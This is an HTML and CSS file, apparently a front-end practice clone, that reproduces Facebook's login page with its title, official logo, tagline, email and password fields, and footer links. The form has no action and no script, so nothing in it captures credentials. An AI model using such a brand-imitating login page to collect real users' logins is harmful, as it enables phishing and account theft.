<html>
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Facebook</title>
        <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Sora">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
        <link rel="stylesheet" href="style.css">

        <style>
            .imgg{
         display: block;
         margin-left: auto;
        margin-right: auto;
            }
            .custom-btn {
  
            color: #fff;
            border-radius: 6px;
            padding: 10px 16px;
           width: 90%;
           font-size: 20px;
           font-family: 'Lato', sans-serif;
           font-weight: 600;
           background: transparent;
           border: none;
           box-sizing: border-box;
           margin: -50px -55px;
           cursor: pointer;
           transition: all 0.3s ease;
  
          display: inline-block;
          box-shadow:inset 2px 2px 2px 0px rgba(255,255,255,.5),
          7px 7px 20px 0px rgba(0,0,0,.1),
          4px 4px 5px 0px rgba(0,0,0,.1);
          outline: none;
  /* and */

}

/* btn-1 */
.btn-1 {
  background: rgb(6,14,131);
  background: linear-gradient(0deg, rgba(6,14,131,1) 0%, rgba(12,25,180,1) 100%);
  border: none;
}
.btn-1:hover {
   background: rgb(0,3,255);
background: linear-gradient(0deg, rgba(0,3,255,1) 0%, rgba(2,126,251,1) 100%);
}


/* formboxanim */

.form-box {


  margin: 20px 0 0 60px;
  width: 395px;
  height: 200px;
  position: relative;
}
.form-box  input {
  background-color: #ffffff;
  color: #3f3b3b;
  font-size: 10px;
  width: 90%;
  text-align: left;
  margin: -10px -50px 0 -50px;
  border: 0;
  border-radius: 10px;
  outline: none;
  font-family: Sora, serif;
  padding: 10px 25px;
  position: relative;
  box-shadow: 1px 0px 12px 4px rgb(217, 217, 225);
  border: 2px solid #575b8e;
  transition: transform 0.2s ease;
}

.form-box form input:hover {
  transform: scaleX(1.15);
}
 </style>
    </head>
    <body>

        <div class="fix-m-header">
            <img src="cell-phone.png" alt="Android">
            <span>Get Facebook for Android and browse faster</span>
        </div>
        <div class="fix-header">
            <span>
                <img class="imgg" src="meta.png" alt="meta-logo" width="5%">
            </span>
        
        </div>
    
        <div class="container">
            <!-- main container -->
            <div class="content">
                <!-- logo container -->
               <div class="left-content">
                   <div class="f-logo">
                       <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook" />
                   </div>
                   <h2 class="f-quote">Facebook helps you connect and share with the people in your life.</h2>
               </div>
               <!-- login form -->
               <div class="right-content">
                   <div class="card">
                       <form>
                           <div class="form-box">
                            <input type="email" name="Email" id="email" autocomplete="off" placeholder="Email" required><br><br><br>
                            <input type="password" name="password" id="password" autocomplete="off" placeholder="Password" required><br><br><br>
                            <br>
                            <br>
                            <button id="demo" class="custom-btn btn-1">Login</button>
                           </div>
                       </form>
    
                       <div class="forgotten-password">
                           <a href="#">Forgotten Password?</a>
                       </div>
    
                       <div class="divider"></div>
    
                       <div class="" style="text-align: center;">
                           <a class="crt-new-ac" href="#">Create New Account</a>
                       </div>
                   </div>
                   <div class="crt-page">
                       <a href="#">Facebook Buisness</a>
                       <span>for a brand or business.</span>
                   </div>
               </div>
            </div>
        </div>
    
        <footer class="f-lg-footer">
            <ul>
                <li><a href="">English (UK)</a></li>
                <li><a href="">বাংলা</a></li>
                <li><a href="">हिन्दी</a></li>
                <li><a href="">اردو</a></li>
                <li><a href="">नेपाली</a></li>
                <li><a href="">ଓଡ଼ିଆ</a></li>
                <li><a href="">Español</a></li>
                <li><a href="">Português (Brasil)</a></li>
                <li><a href="">Français (France)</a></li>
                <li><a href="">Deutsch</a></li>
                <li><a href="">Italiano</a></li>
            </ul>
            <div class="divider"></div>
            <ul>  
                <li><a href="">Sign Up</a></li>
                <li><a href="">Log In</a></li>
                <li><a href="">Messenger</a></li>
                <li><a href="">Facebook Lite</a></li>
                <li><a href="">Watch</a></li>
                <li><a href="">Places</a></li>
                <li><a href="">Games</a></li>
                <li><a href="">Marketplace</a></li>
                <li><a href="">Facebook Pay</a></li>
                <li><a href="">Jobs</a></li>
                <li><a href="">Oculus</a></li>
                <li><a href="">Portal</a></li>
                <li><a href="">Instagram</a></li>
                <li><a href="">Local</a></li>
                <li><a href="">Fundraisers</a></li>
                <li><a href="">Services</a></li>
                <li><a href="">Voting</a></li>
                <li><a href="">Information Centre</a></li>
                <li><a href="">About</a></li>
                <li><a href="">Create ad</a></li>
                <li><a href="">Create Page</a></li>
                <li><a href="">Developers</a></li>
                <li><a href="">Careers</a></li>
                <li><a href="">Privacy</a></li>
                <li><a href="">Cookies</a></li>
                <li><a href="">AdChoices</a></li>
                <li><a href="">Terms</a></li>
                <li><a href="">Help</a></li>
                <li><a href="">Settings</a></li>
            </ul>
        </footer>
    
        <div class="m-footer">
            <div class="m-f-lang">
                <ul>
                    <li><a href="">English (UK)</a></li>
                    <li><a href="">বাংলা</a></li>
                    <li><a href="">हिन्दी</a></li>
                </ul>
                <ul>
                    <li><a href="">اردو</a></li>
                    <li><a href="">नेपाली</a></li>
                    <li><a href="">ଓଡ଼ିଆ</a></li>
                </ul>
            </div>
            
    
            <div style="clear: both;"></div>
    
            <div class="links" style="text-align: center;">
                <a href="#">About</a><a href="#">Help</a><a href="#">More</a>
            </div>
    
            <div style="font-weight: 600;text-align: center;margin: 10px 0;color: #777;">Facebook Inc</div>
        </div>
    
        
        
    </body>
</html>
<!-- coded by junaid mir -->
<!-- ©2022 -->